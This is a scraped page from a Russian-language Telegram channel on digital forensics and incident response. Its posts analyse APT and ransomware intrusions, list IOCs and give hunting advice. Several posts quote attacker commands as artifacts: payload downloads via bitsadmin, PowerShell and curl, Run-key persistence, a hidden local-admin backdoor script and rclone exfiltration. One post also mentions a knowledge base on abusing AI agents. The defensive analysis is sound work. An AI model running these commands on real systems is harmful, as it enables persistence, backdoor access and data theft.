DFIR Father
رفتن به کانال در Telegram
🕵🏻♂️ Focused entirely on Digital Forensics and Incident Response. 👀 Sharing tools, techniques, and practical cases for DFIR professionals. 👨🏻💻 Author: @sepi0lh4ze https://t.me/boost/DFIRFather
نمایش بیشترکشور مشخص نشده استدسته بندی مشخص نشده است
319
مشترکین
اطلاعاتی وجود ندارد24 ساعت
+17 روز
+630 روز
در حال بارگیری داده...
کانالهای مشابه
هیچ دادهای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
ابر برچسبها
هیچ دادهای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
آوریل '26
آوریل '26
+1
در 0 کانالها
مارس '26
+11
در 0 کانالها
Get PRO
فوریه '26
+62
در 0 کانالها
Get PRO
ژانویه '26
+34
در 0 کانالها
Get PRO
دسامبر '25
+12
در 0 کانالها
Get PRO
نوامبر '25
+10
در 0 کانالها
Get PRO
اکتبر '25
+204
در 0 کانالها
| تاریخ | رشد مشترکین | اشارات | کانالها | |
| 05 آوریل | 0 | |||
| 04 آوریل | +1 | |||
| 03 آوریل | 0 | |||
| 02 آوریل | 0 | |||
| 01 آوریل | 0 |
پستهای کانال
Repost from Threat Hunting Father 🦔
AI как Living-off-the-Land
Звучит классно?)
Вот и разговор с https://t.me/s0ld13r_ch был довольно интересным на эту тему, в результате дискуссии родился проект, LOLAI нечто похожее на LOLBins / LOLBAS / LOLDrivers.
LOLAI проект для тех кто хочет чтобы за него все сделал AI
LOLAI это база знаний которая описывает:
• векторы атак с использованием ИИ агентов
• способы злоупотребления легитимными агентами и API
• detection opportunity / hunting use cases
Если есть интересный агент который можно использовать для Red Team/Adversary Emulation, feel free to contribute будем только рады ☺️
Ну а пока читай что мы собрали и пробуй хантить в своей инфраструктуре 😈
🖱🔜 lolai-project.github.io
🦔 THF
Максимальный репост друзья, дадим жизнь проекту‼️
| 2 | Hiding a Windows Service by Pavel Yosifovich
https://www.youtube.com/watch?v=4xn4cjC2U_I | 177 |
| 3 | 🔍 TrustFall & MystRodX:
Исследователи из АО ГТС на PROFIT.KZ представили разбор вредоносной активности, в которой фигурируют два связанных инструмента — TrustFall и MystRodX.
Они отдельно отметили, что о схожем вредоносе ранее писали аналитики QAX (@RedDrip7), которые использовали название MystRodX для такого же типа атаки.
По данным ГТС, это звенья одной кампании, наблюдавшейся в 2025 году.
🧩 TrustFall (март 2025)
Лёгкий backdoor: выполняет команды через /bin/sh, пакует данные (tar -czvf), удаляет следы (rm -rf) и отправляет информацию через POST на /news/data_form.php. Использует фиксированные C2 и позже — шифрование.
🧩 MystRodX (август 2025)
Более новая стадия той же линии: обновлённый модуль с другим форматом сетевого обмена, зашифрованным трафиком и расширенной C2-инфраструктурой. Распространялся через 139.84.156.79.
🗃 IOC
185.154.154.135
213.159.64.6
2.56.177.181
37.221.125.201
5.252.22.232
45.14.244.110
45.83.140.218
154.196.162.76
Сервер распространения
139.84.156.79
Конфигурационные файлы
tcbipkrn.config → 185.154.154.135
baeeajzb.config → 213.159.64.6
URI
/news/data_form.php
Поведенческие признаки
tar -czvf
rm -rf
/bin/sh -c "<command>"
шифрование трафика (в поздней активности)
смена канала управления
🎯 APT группы:
STA-2201
Группа, впервые замеченная в 2019, работает по двум направлениям:
• Initial Access Broker (первичный доступ)
• Классическая APT-активность: кража и эксфильтрация данных
Позже стала действовать более скрытно.
Сектора: госуправление, телеком.
STA-2404
Продвинутая хакерская группа, образованная после структурных изменений (детали скрыты).
Активность отслеживается с 2024 года (две волны).
Сектора: госуправление, энергетика, здравоохранение, наука, транспорт, финансы.
🔗 Ссылки
• Презентация: https://profitday.kz/pdf/security2025/15.pdf
• sts.kz
• Запись выступления: https://www.youtube.com/live/8eueDGkMMlo?t=26395
•https://blog.xlab.qianxin.com/mystrodx_covert_dual-mode_backdoor_en/
🦔 THF | 105 |
| 4 | Cavalry Werewolf: целевая атака на госсектор РФ
⚙️ Формат атаки
🎯 Фишинг → архив с паролем («Служебная записка», «План работы почтового сервера») → исполняемый файл с бэкдором BackDoor.ShellNET.1 (на основе Reverse-Shell-CS).
После запуска – обратное соединение с C2 и ручное выполнение команд через cmd.exe.
Через него операторы докачивают новые модули через LOLBAS:
bitsadmin /transfer www /download hxxp://ip/winpot.exe C:\Users\Public\Downloads\winpot.exe
Первым ставится Trojan.FileSpyNET.5 – стилер документов, картинок и txt-файлов → IP/fileupper/getupper.php.
Затем – BackDoor.Tunnel.41 (ReverseSocks5) для создания SOCKS5-туннеля и незаметного удалённого доступа.
🧠 Цели и действия атакующего
Атакующие проводят ручную разведку через cmd.exe:
whoami
ipconfig /all
net user
dir C:\Users\<user>\Downloads
dir C:\Users\Public\Pictures
Проверяют сетевые прокси:
[System.Net.WebRequest]::DefaultWebProxy.GetProxy("https://google.com")
Загружают новые модули через PowerShell и curl:
powershell -Command Invoke-WebRequest -Uri "hxxps://sss.qwadx.com/revv3.exe" -OutFile "C:\Users\Public\Pictures\rev.exe"
curl -o C:\Users\Public\Pictures\rev.exe hxxp://IP/code.exe
Закрепление через Run-ключ:
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\Users\Public\Pictures\win.exe /f
Удаление следов: powershell -Command Remove-Item C:\Users\Public\Pictures\732.exe.
🧩 Инструменты Cavalry Werewolf
BackDoor.ShellNET.1 / .2 — C#-бэкдоры (Reverse-Shell-CS, Telegram-бот).
BackDoor.ReverseProxy.1 — ReverseSocks5 (Golang), revv2.exe -connect IP:10443.
Trojan.Inject5.57968 — инжект в aspnet_compiler.exe, шифрование RC2 / AES, C2.
Trojan.Packed2.49708 / Siggen31.54011 — лоадеры Spy-бэкдоров с XOR-дешифровкой.
Trojan.Packed2.49862 — троянизированные программы (WinRAR, 7-Zip, VS Code, AkelPad, SumatraPDF) → доставляют AdaptixC2, Havoc, CobaltStrike, Meterpreter, AsyncRAT.
Trojan.Clipper.808 — крадет криптокошельки, копирует себя в %APPDATA%\systemservices\svc_host.exe, добавляет Run-ключ SystemServicesHost, сообщает в Telegram-бот о заменённых адресах.
⛓️💥Типовая цепочка действий
1️⃣ Фишинг → BackDoor.ShellNET (обратный шелл).
2️⃣ Разведка: whoami / ipconfig / net user.
3️⃣ Загрузка новых модулей через bitsadmin, PowerShell или curl.
4️⃣ Закрепление через Run-ключ или планировщик.
5️⃣ Инжект в .NET-процесс, маскировка под легитимный aspnet_compiler.exe.
6️⃣ Создание туннелей и Telegram-C2.
7️⃣ Эксфильтрация документов, удаление следов.
🧠 Тактические наблюдения
Массовое использование open-source (Reverse-Shell-CS, ReverseSocks5, AdaptixC2, Havoc).
Telegram-C2 как универсальный контроль вместо доменов.
Мимикрия под госдокументы и троянизированные программы.
Активная LOLBAS-цепочка: bitsadmin → powershell → cmd.exe.
Хранение и запуск из C:\Users\Public\Pictures|Libraries|Downloads.
Переход от разведки к туннелям и долговременному C2 в одном цикле.
🔍 Что отслеживать
• Исполнение EXE из Public-директорий.
• Bitsadmin с /transfer и URL-адресами.
• PowerShell Invoke-WebRequest → Public-папки.
• Инжект в aspnet_compiler.exe.
• Run-ключи с путём на C:\Users\Public\.
• Трафик к api.telegram.org или подозрительным IP
🔗https://news.drweb.ru/show/?i=15078
🦔 THF | 149 |
| 5 | Интересный разбор про Комрад Сайгу 🦌 | 123 |
| 6 | CVE-2025-9491 (ZDI-CAN-25373) - Непатченная уязвимость Windows в активной эксплуатации (PlugX)
Суть уязвимости:
Критическая уязвимость в обработке Windows LNK файлов (ярлыков). Позволяет скрывать вредоносные аргументы командной строки в поле Target через добавление пробелов, делая их невидимыми в стандартном UI Windows.
История эксплуатации:
Активно используется APT группами из КНДР, Ирана, России, Китая с 2017 года
Публично раскрыта Trend Micro ZDI в марте 2025
Текущая кампания (сентябрь-октябрь 2025):
Атрибуция: UNC6384
Цели: дипломатические структуры ЕС (Венгрия, Бельгия, Италия, Нидерланды) и авиационные департаменты правительства Сербии
Вектор атаки:
Spearphishing с встроенным URL,
Доставка вредоносных LNK файлов (темы: встречи Еврокомиссии, семинары НАТО),
Запуск обфусцированных PowerShell команд, Многоступенчатая цепочка заражения,
Развертывание PlugX RAT через DLL side-loading легитимных утилит Canon
Позиция Microsoft :-)
Уязвимость зарегистрирована ZDI в сентябре 2024, Microsoft отказалась выпускать патч, считая что не соответствует критериям обслуживания
Предлагаемая защита: Microsoft Defender + Smart App Control и возможно исправление в будущих feature релизах
Индикаторы компрометации:
LNK файлы с аномально длинным Target полем
DLL side-loading через cnmpaui.exe, cnmpauix.exe, cnmplog.dat
HTA файлы с загрузкой JS с CloudFront URL
Инфраструктура C2 на базе CloudFront
Рекомендации:
Блокировка LNK файлов на периметре
Мониторинг аномальных запусков PowerShell через LNK
Контроль DLL side-loading легитимных процессов
Анализ исходящих подключений к CloudFront CDN
https://github.com/advisories/GHSA-6rf6-f9qg-8v94 | 114 |
| 7 | Давеча в одном из кейсов встретили постэксплуатационный фреймворк AdaptixC2. Что-то новенькое itw!
Кратко накину контекст, я думаю, вы поймете, почему:
proxyshell →
adrecon, sharphound →
fscan →
rdp, psexec, obfuscated powershell, winrm →
cobalt strike →
RMM (AnyDesk, RMS, Mesh Agent, TacticalRMM) →
nuget, devtunnel, chisel →
adaptixc2 via nssm →
dll w/ telegram c2 channel →
sliver
Все приправлено кастомным шифровальщиком через GPO. И это даже не очередной экземпляр LockBit 🏴
Самое интересное — здесь: https://habr.com/ru/companies/angarasecurity/articles/962088/ | 143 |
| 8 | И снова стилеры, и снова здравствуйте 😃
Исследуя логи стилеров и ULP, можно наткнуться на интересную строчку malware_path (в частности в API сервиса Hudsonrock), как можно понять из названия это поле где находился вредонос на атакованном хосте 🫢
Эту фичу можно выгодно использовать для Threat Hunting: часто файлы подкидывают в предсказуемые места и можно обогатить hunting queries. В нашем случае - стандартный .NET-путь. 🥺
🛡 Query
event.code: 11 and file.path: *Microsoft.NET\\Framework\\v4.0.30319* and file.extension: exe
Больше про использование данных с теневых ресурсов можно почитать тут
🧢 s0ld13r | 149 |
| 9 | Когда исследование превращается в боевую игрушку - одни выкладывают PoC, другие - уже катают это в реальных кампаниях. 👿
🤓 Началось всё с обычного ISO - на вид ничего криминального, но внутри прятался обфусцированный шеллкод. Механика старая, но рабочая: DLL-sideloading - легитимный процесс подхватывает "чужую" DLL, та разворачивает payload и инжектит код в RuntimeBroker.exe. Это именно тот сценарий, о котором пишут в статье.
Авторы разобрали ISO, расшифровали XOR-обфускацию и описали, как код оживает в памяти. По сути - нормальная исследовательская работа: показать, как метод работает и какие артефакты остаются после исполнения.
Дальше - самое неприятное. 🚬
Проект с исходниками (DLL + отладочный EXE) попал в публичный репозиторий, и рядом с исходниками остались PDB-метки вроде OneDriveUpdaterSideloading. Эти метки - мелочь, но для кого-то достаточно, чтобы собрать тот же бинарь и использовать его в реальной атаке.
Не прошло и много времени, собранный из репо DLL практически идентичен тому, что потом нашли "в поле". Разница - символическая: в XOR-ключ добавили букву "s" и все, логика осталась та же.
😰 То есть взяли PoC, слегка поправили и запустили.
Ещё момент - инструментарий. В одних инцидентах исследователи/атаки шли через BruteRatel, в других - через Cobalt Strike. Суть не в тулзе, а суть в том, что рабочая техника - готовая деталь, которую можно вставлять в любой C2-набор.
Авторы в материале показывают скриншоты декодирования шеллкода, сравнение версий DLL/EXE и описание того, как из "учебного" репо получается боевой бинарь. Там же есть упоминания про наблюдаемые IP и гибкие C2-профили - пример конкретного "маячка" в тексте: 193.37.x[.]x. Это не художественный вымысел - это реальные следы, которые складываются в картинку. 🙂
☄️ Вывод простой и немного жесткий: публикация рабочего PoC с метаданными - это подарок для того, кто умеет быстро собрать и адаптировать. Исследование должно помогать защитникам, а не давать готовые рецепты для злоумышленников.
Если коротко - учись, показывай результат, но думай, что выкладываешь в паблик: PDB-строки, готовые бинарники и явные инструкции облегчают превращение исследования в оружие. И да, эта история - как раз про то, что один коммит может иметь далекоидущие последствия. 🤫
🔗 https://www.ctfiot.com/134357.html
🐦⬛ DFIR Father | 222 |
| 10 | 🦖Velociraptor теперь в руках ransomware
Сisco Talos подтвердили: операторы ransomware используют Velociraptor как «тихий RMM/оркестратор» внутри сети жертвы 🐈⬛. В инциденте августа 2025 акторы связаны с Storm-2603 (mod. confidence) и параллельно катили Warlock, LockBit и Babuk: Windows шифровали с расширением .xlockxlock, ESXi — частично с .babyk. Развёртывание шло через тихий MSI (Blob Storage), дальнейшее — Impacket/Smbexec, правки GPO для глушения Defender, доступ к vSphere и fileless PowerShell для массового шифрования и эксфильтрации (тихий режим $ProgressPreference='SilentlyContinue', задержки Start-Sleep). Среди IOC — C2 на workers.dev. Начальный вектор с высокой вероятностью — эксплуатация цепочки SharePoint ToolShell. Это не баг Velociraptor — это злоупотребление его легит-функциями.
😁Отдельно про уязвимость: CVE-2025-6264
В Talos-кейсах злоумышленники ставили старый Velociraptor 0.73.4.0, уязвимый к CVE-2025-6264 (эскалация через артефакт Admin.Client.UpdateClientConfig при наличии прав COLLECT_CLIENT → произвольные команды/захват агента). Исправления опубликованы в ветке ≥ 0.74.3 — обновляйтесь.
🐈⬛Что делать, как защищаться
1️⃣ Инвентаризация и контроль установок
- Проверьте, что все серверы/агенты Velociraptor — ваши; «левых» инсталляций быть не должно.
- Запретите исполнение неподписанных бинарей Velociraptor; официальные билды Rapid7 — подписаны.
- Алерты на новые службы/таски с velociraptor.exe и исходящие к портам :8000 / :8001 / :8889; при сомнениях — ротируйте API/Auth-ключи.
2️⃣ Базовые детекты «чужого» Velociraptor
- При первом старте создаётся источник EventLog Velociraptor:
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Velociraptor — mtime ≈ первый запуск.
- Каждый запуск пишет в Application Event ID 1000 с ARGV (--config, client.config.yaml, service run). Это ловит внезапные установки/рестарты и нестандартные аргументы.
- Если бинарь пересобрали и вырезали IOCs — он, как правило, без подписи Rapid7 → ловите политиками/EDR.
- Используйте готовые YARA (уникальные строки Velociraptor) и экспериментальное Sigma для детекта нестандартных путей/аргументов/unsigned.
3️⃣ Патч-менеджмент и «Golden» клиент
- Обновите сервер/агентов до ≥ 0.74.3 (CVE-2025-6264), перевыпустите «Golden» клиент и перепроверьте client.config.yaml (сервер, сертификаты, политики).
4️⃣ Закройте TTP из кейса Talos
- Блокируйте подозрительные MSI-загрузки (Blob/msiexec /q /i https://...), мониторьте Impacket/Smbexec-паттерны.
- Контролируйте GPO-правки, отключающие RTP/Behavior Monitoring/“monitor file & program activity” — это немедленный инцидент.
- Следите за доступом к vSphere и созданием/синком админ-аккаунтов в Entra ID.
- Охотьтесь на fileless PowerShell-шифратор и скрипт эксфильтрации (тихий режим + паузы).
5️⃣Охотьтесь Velociraptor-ом за Velociraptor-ом
- Если у вас уже развёрнут Velociraptor — используйте артефакт Velociraptor Inception (Rapid7 Labs) для поиска несанкционированных инстансов.
6️⃣ Политики, роли и артефакты
- Ограничьте доступ к «опасным» артефактам через required_permissions, не раздавайте широкие роли (ARTIFACT_WRITER) «кому попало», верифицируйте артефакты перед публикацией (artifacts verify)
🔗https://www.rapid7.com/blog/post/pt-identifying-and-mitigating-potential-velociraptor-abuse/
🔗https://docs.velociraptor.app/knowledge_base/tips/velocirator_misuse/
🔗https://blog.talosintelligence.com/velociraptor-leveraged-in-ransomware-attacks/
🦔THF
Rapid7 отдельно подчёркивает: это злоупотребление легит-инструментом, а не баг в продукте. Но без базовой гигиены вы рискуете потерять контроль над агентами и превратиться в C2-точку для APT/криминала. Включите детекты из их гайда (в т.ч. Sigma/YARA) и проведите экспресс-аудит прямо сегодня. | 215 |
| 11 | Сегодня расскажу вам о базной базе — закреплении в системе, aka persistence.
Почему это важно? 📝
Потому что без закрепления злоумышленник — родственник проездом. Сбросил сессию, и до свидания! А вот если он прописался в автозагрузке, службе, драйвере или даже в кодеке — готовься, это уже "долгосрочная аренда" 👎
На постере — классная карта от Florian Thiele: все способы закрепа в Windows в одном месте. От старых добрых Run-ключей до хитрых Winlogon-хуков и LSA Providers. Короче, если хочешь знать, где может жить злоумышленник — это твоя топографическая карта ада. 😈
🔍 Как всё это проверять:
• На живом хосте: юзай Autoruns от Sysinternals. Видно всё, от автозагрузки до драйверов.
• Если у тебя мертвый диск: бери uVS (Universal Virus Sniffer), старичок, но всё видит.
• В дампе памяти: в бой идёт Volatility3 с кастомным плагином autorun (ссыль на гитхаб приложу). Очень удобно, кстати))
🌚 Совет: если видишь странный таск с cmd /c powershell -exec bypass, или DLL в AppData — не думай долго, копай глубже.
Persistence — это не след, это подпись жильца. А жильцы бывают разные. 🥴
🔗 https://how2itsec.blogspot.com/2025/03/windows-persistence-map-v01.html
🔗 https://github.com/PXS-LU-CSIRT/volatility3-autoruns
🐦⬛ DFIR Father | 215 |
| 12 | 👀 Подоспел кратенький разбор полетов нового отчета
The DFIR Report!
Один клик по налоговой форме "W-9" — и у тебя в сети незаметный квартирант почти на два месяца. 😏
Актор зашел через социалку. Жертва открывает сильно обфусцированный JS Form_W-9_…js, скрипт молча тянет MSI.msi с хоста и через легитимный rundll32 подхватывает DLL-ку — следующий этап уже Brute Ratel и цепочка инъекций. Дальше следует буквально пошаговая экспансия: loader → badger → инъекция в системные процессы → снаффер/стилер.
Дальше — Latrodectus в explorer.exe, BackConnect/VNC для живого просмотра файлов и аплоада дополнительного инструментария, а затем поиск "сокровищ": браузерные профили, дампы LSASS, и внимание — unattend.xml с plain-text админ-кредами, найденный на третьи сутки. 🥷
Один файл — и у них доменный админ в кармане. Что-то мне это напоминает...
Когда они стянули доменного админа, у акторов буквально загорелись глаза: 🤩
runas / Secondary Logon для получения токенов, развёртывание Cobalt Strike (первые файлы — cron801.dl_ → позже system.dl_, запуск через rundll32 cron801.dl_,lvQkzdrFdILT) и массовое lateral-движение через PsExec / RDP на DC, файло- и backup-серверы.
Пара процессов, которые облегчают распознавание цепочки: rundll32 → explorer.exe(инжект) → sihost.exe (инжект Cobalt) → gpupdate.exe (run as Domain Admin) → spoolsv.exe (инжект).
⏸ Пауза для пары ярких артефактов:
• MSI внутри .cab-файлика с upfilles.dll и кастомным shellcode/RC4 развёртывателем Brute Ratel; wscadminui.dll появится позже как заменитель badger’а.
• .NET-бэкдор lsassa.exe, который кладет в ресурс зашифрованный пэйлоуд, ставит запланнированный таск и стучиться к C2 каждые ~250 секунд.
🌐 Про сеть и эксфиль: на ~20-й день злоумышленники запускают переименованный rclone для массового съёма файлов со шары и гонят их по FTP в течении ~10 часов подряд — классическая "долгая перетяжка" данных, а не один короткий слив. После этого снова — пауза, повторные визиты, дампы бэкапов, реконкига и скан подсетей rustscan.
🍽 Технические строки, которые стоит знать и глянуть в логах (копипаста для заметок, не для эксплуатации):
# стартовая команда из кейса
cmd.exe /K chcp 65001 && c: && cd c:\
# Brute Ratel / Cobalt запускают через rundll32
rundll32 wscadminui.dll, wsca
rundll32 cron801.dl_,lvQkzdrFdILT
# scheduled task от lsassa.exe
schtasks /create /tn "SchedulerLsass" /tr "%ALLUSERSPROFILE%\USOShared\lsassa.exe" /sc onstart
# rclone (переименованный бинарь) - типичный пример
"C:\Windows\Temp\sihosts.exe" rclone copy "C:\share" remote:bucket --config "C:\Users\Public\rclone.conf"
Что лично цепляет в этом кейсе: 🤓
1. Начало — не фишинг-послание с явным приколом, а псевдолегит-JS, замаскированный под W-9, с тонкой обфускацией (много комментов/филлеров). Это рвет большинство "сигнатурных" детектов, если не делать deobf/JS-энжин-хантинг.
2. Использование легитимных бинарей Windows (rundll32, schtasks) + популярных админ-утилит (PsExec, RDP) = blend-in поведение. Т.е. вор крадёт под видом штатных операций.
3. И самый факапный факап — unattend.xml как слабое звено. Если автоматизированные деплой-файлы хранятся с плейн-текстом админок, это почти гарантированный disaster при наличии начального доступа. 😎
👀 А само изящество кейса в том, что тут нет яркой взрывной активности. Все сделано по-взрослому, в маске легитимных тулзов. Ну и скорее всего акторы сознательно чередовали длинные периоды "тишины" и короткие всплески активности, чтобы уклоняться от базовых триггеров.
🔗 https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/
🐦⬛ DFIR Father | 223 |
| 13 | 🔍 Forensic journey: hunting evil within AmCache
AmCache.hve — один из ключевых forensic-артефактов Windows, фиксирующий метаданные о бинарях: путь, размер, версию, SHA-1 (до 31 MB), PE-LinkDate, Publisher и др. Его ценность в том, что даже удалённые или модифицированные файлы оставляют следы, а сами записи сложно подделать или стереть.
Основные forensic-ключи AmCache
• InventoryApplicationFile — все исполняемые файлы: путь, имя, версия, SHA-1, PE-LinkDate. Позволяет находить удалённые утилиты (пример: winscp.exe в Downloads).
• InventoryApplication — сведения об установленных приложениях: InstallDate, MSI-метаданные, UninstallString. Хорошо палит удалённый AnyDesk.
• InventoryDriverBinary — загруженные драйверы: хэш, путь, подпись, LastModified. Используется для ловли уязвимых/вредоносных драйверов (см. LOLDrivers, AV Killer).
• InventoryApplicationShortcut — .lnk-файлы (путь и цель), полезно для подтверждения использования стёртых приложений.
⚠️ Ограничения:
SHA-1 хранится только по первым ~31 MB бинаря → большие малвари не хэшируются полностью.
Не всё = факт запуска: часть записей фиксирует только присутствие файла.
🛠 AmCache-EvilHunter
Kaspersky🍿 выпустили CLI-утилиту для парсинга Amcache.hve:
фильтрация по дате (--start/--end),
поиск по ключевым словам (--search),
экспорт в CSV/JSON,
автоматический поиск “suspicious” бинарей (scvhost.exe, 1.exe, случайные hex-имена),
фильтры по Publisher (--missing-publisher) и системным компонентам (--exclude-os),
интеграция с VirusTotal и Kaspersky OpenTIP (--vt, --opentip).
🎯 Практические use-cases
Поиск удалённых бинарей (инсайдер использовал winscp.exe).
Фиксация временной установки AnyDesk для RMM.
Корреляция драйверов для выявления BYOVD и persistence.
Проверка ярлыков для подтверждения запуска софта.
📌 Вывод:
AmCache ≠ “история запусков”, но это must-have артефакт DFIR, особенно в связке с Prefetch, ShimCache и event-логами. Правильный парсинг + TI-lookup → IOC-генерация, восстановление таймлайна, обнаружение удалённых утилит и драйверов.
🔗 https://securelist.com/amcache-forensic-artifact/117622/
🦔 THF | 195 |
| 14 | Возвращаемся к разбору факапов и техник злоумышленников!
Fck-upology of the Infrastructure: Mistakes That Build an Attack (Part 3) 💀
***Все написанное - плод больного воображения автора!
Сегодняшний важный тейк 📌
Актору не нужны зиродеи, если вы закрыли глаза на C:\ProgramData.
Персистенс тут не баг, а бизнес-модель — положили стартовый набор в места, куда админы регулярно пишут, и он живет как родной.
⚠️ Fuckup: Persistence on Autopilot
Если ProgramData доступен для записи и у админов нет жестких бэйслайнов, закрепление превращается в рутину. Патчей может быть сколько угодно — но пока базовые директории и процессы не поставлены под контроль, атакующие будут возвращаться снова и снова.
Факт. Акторы жили в системных путях и ProgramData, пряча свои компоненты под нейтральными именами. Их стартер-пак —это сервисы, запланированные задачи, Run-ключи и многостадийные вредоносы в ProgramData. 😱
👀 Почему это плохо
• Рутинные админ-операции = persistence by design.
• ProgramData — отличная площадка для различного рода залетной малвари.
• Нейтральные имена и папки типа Microsoft* или Windows* тонут в системном шуме.
• Нет жестких ограничений — недоверенный код работает как доверенный.
Какие артефакты я видел при исследовании:
• sc create WinUpdateSvc binPath= "C:\ProgramData\Microsoft\googleup.exe …
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File c:\programdata\microsoft\MF\GetPst.ps1
• C:\ProgramData\Microsoft\MF\procdump64.exe
• C:\Windows\Microsoft.net\Framework64\v4.0.30319\MicrosoftServerManager.exe
Парадокс в том, что это часто не выглядит как малварь - а как админская рутина: подписанный exe в ProgramData, таск в Microsoft\Windows, PowerShell-скрипт, запущенный админом. Для расследования это гадко, легитимность мешает увидеть зло. 👿
🔍 Что глянуть в первую очередь:
• Сервисы с binPath в C:\ProgramData: Get-WmiObject Win32_Service | Where { $_.PathName -like "*ProgramData*" }
• Нестандартные задачи в Task Scheduler (TN в Microsoft\Windows с ProgramData).
• Исполняемые файлы в ProgramData или в других типовых директориях + проверка подписи (Get-AuthenticodeSignature).
• Логи запуска PowerShell с особым вниманием на -ExecutionPolicy Bypass/-WindowStyle Hidden.
Итог. Патчи важны, но иногда персистенс нужно просто вырезать из практики — поменять регламенты, ограничить запись в ProgramData, ввести белые списки сервисов и контроль тасков. Если для админов это станет обычной рутиной, то как минимум для актора лишней головной болью. 😠
🐦⬛ DFIR Father | 256 |
| 15 | Продолжаем! Сегодня поведаю о похожем, но не менее интересном приеме злоумышленников.🤓
Fck-upology of the Infrastructure: Mistakes That Build an Attack (Part 2) 💀
***Все написанное - плод больного воображения автора!
Важный тейк на сегодня: удобство для админа часто превращается в запасной ключ для злоумышленника. Кикнули актора из AD — он все равно вернется по RDP, если у вас открыт черный ход на локалках!
⚠️ Fuckup: Local Backdoor as “Plan B”
Акторы держат запасной путь через скрытую локальную учетку и пару тихих политик. Доменные креды сгорели? Не страшно — локальная дверь осталась открыта.
🔍 Какие артефакты я видел на диске:
C:\ProgramData\Microsoft\QuickHeal\123.bat — неприметный батник, который все делает за них.
Что он делает под капотом? 😁
- Добавляет скрытого Administrator$ в группу пользователей RDP:
net localgroup "Пользователи удаленного рабочего стола" Administrator$ /add
- Прячет учетку от UI через реестр (hidden=0):
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
- Выдает полный админ-токен в ремоут-сессиях:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy=1
- Делает учетку бессрочной:
net user Administrator$ /expires:never
- И финт ушами — самоудаление: 🤔
del %0
Почему это больно? 🥺
Потому что учетки локальных админов разрешены и почти не мониторятся. Что уж говорить о незаметных правках политик по типу RDP или фильтрации токенов, которые тонут среди всей рутины. Ну и для актора ничего не поменялось, потому что когда доменную дверь закрыли —> локальная осталась открыта.
👀 DFIR-наброски для себя
Смотрим членство в локальных группах, свежие задачи в планировщике, ключи UserList и LocalAccountTokenFilterPolicy, таймлайн создания Administrator$ и запусков cmd/pwsh рядом. Если почистили домен, но кто-то продолжает логиниться по RDP — ищите такой «план Б».
До завтра!
🐦⬛ DFIR Father | 245 |
| 16 | Так, мини-каникулы после конфы позади - запускаю серию ежедневных небольших райтапиков по самым вкусным и интересным моментам из доклада. 🕺
Fck-upology of the Infrastructure: Mistakes That Build an Attack (Part 1) 💀
***Все написанное - плод больного воображения автора!
В первую очередь хочу зафиксировать тейк: удобство для админа = преимущество для злоумышленника. В расследованиях снова и снова всплывают исключения и времянки, которые когда-то запитчили менеджменту ради скорости. Увы, эти «удобства» потом прилетают по полной инфре 😢
Сегментация как шутка 😾
На бумаге при проектировании было три зоны: пользовательская, сервисная и доменная. В реале - одна большая плоская сеть. Определены «коридоры доверия» через легитные SMB/RPC/WMI/WinRM и межзонные NTLM-логоны. Для АКТОРа это уже не хак, а поездка по прямым рельсам: Domain -> Service -> User.
⚠️ Fuckup: Mail server = HQ
В этой инфре Exchange перестал быть просто почтовиком и превратился в оперативный штаб злоумышленников. Почему так вышло:
1. В типовых директориях лежали .aspx вебшеллы, которые ловили запросы извне и исполняли команды на стороне клиента:
C:\inetpub\wwwroot\owa\auth\*.aspx
C:\inetpub\wwwroot\aspnet_client\*.aspx
2. В журналах видно скрытые инстансы PowerShell (в журналах Exchange [EID 1] и PwShClassic [EID 400]):
powershell.exe -noni -nop -w hidden -c "<cmd>"
3. Псевдо-«WindowsUpdate» в планировщике задач:
C:\Windows\System32\Tasks\WindowsUpdate
Эта штука тащила в автозапуск GetPst.ps1, который собирал пачки PST и скидывал их на шару (сам скрипт - на скрине). 📝
👀 Вкратце, что делал скрипт:
- сохранял дату на сетевую шару;
- выдавал супер-админу роль на экспорт почты;
- читал список почтовых ящиков из C:\Users\public\documents\2.txt;
- по каждому создавал New-MailboxExportRequest;
- складывал PST в \\share\...\temp\<mailbox>.pst;
- по завершении удалял экспорт-запросы, чтобы не светиться.
Итог простой: почтовик = тихий C2 и лутбокс. Админские «времянки» и плоская сеть превращают инфраструктуру в трассу для актора. 🙂
До завтра!
🐦⬛ DFIR Father | 230 |
| 17 | Ну, получается, выступил! 😮💨
Всем спасибо, кто пришел послушать из подписчиков, и тем, кто подписался после доклада. 😽
Эксклюзивно для вас я подготовлю мини-райтап того, что я рассказал на конференции.
Ждите 🔥 | 249 |
| 18 | Sekoia.io рапортует об интересной цепочке APT28
APT28 в 2025 использует гибрид open-source + легитимные облачные сервисы для скрытого C2: старт — weaponized Office (Signal ⟶ макросы) → COM-hijack DLL (prnfldr.dll) → извлечение shellcode из PNG (стеганография) → запуск .NET Grunt HTTP Stager (Covenant) → Koofr как C2 (C2Bridge) → последующие модули (PlaySndSrv.dll + sample-03.wav) декриптят и ставят BeardShell (icedrive C2). Параллельно обнаружен SlimAgent (keylogger/screenshots). Технично, стабильно, хитро — используют regsvr32 / COM hijack, PNG LSB-стеганографию, в-памяти загрузку .NET, ChaCha20-Poly1305 для BeardShell.
Стега в 2025 👀👀👀
Интересные техники, к прочтению:
🔗https://blog.sekoia.io/apt28-operation-phantom-net-voxel/
🦔 THF | 233 |
| 19 | А теперь пришел и мой черед позвать всех вас на KazHackStan 😜
Вместе с Шерханом на примере расследования реального инцидента мы расскажем, как из «мелочей» вырос фулл-домен рейд.
Факапы админов, лестница из дырок, артефакты на каждом шаге — все покажем, все разжуем. 👍
🔗 https://t.me/kazhackstan2023/476
🔗 https://kazhackstan.com/
🐦⬛ DFIR Father | 1 161 |
| 20 | 👀 User Access Logging: быстрый источник латералки в Windows Server
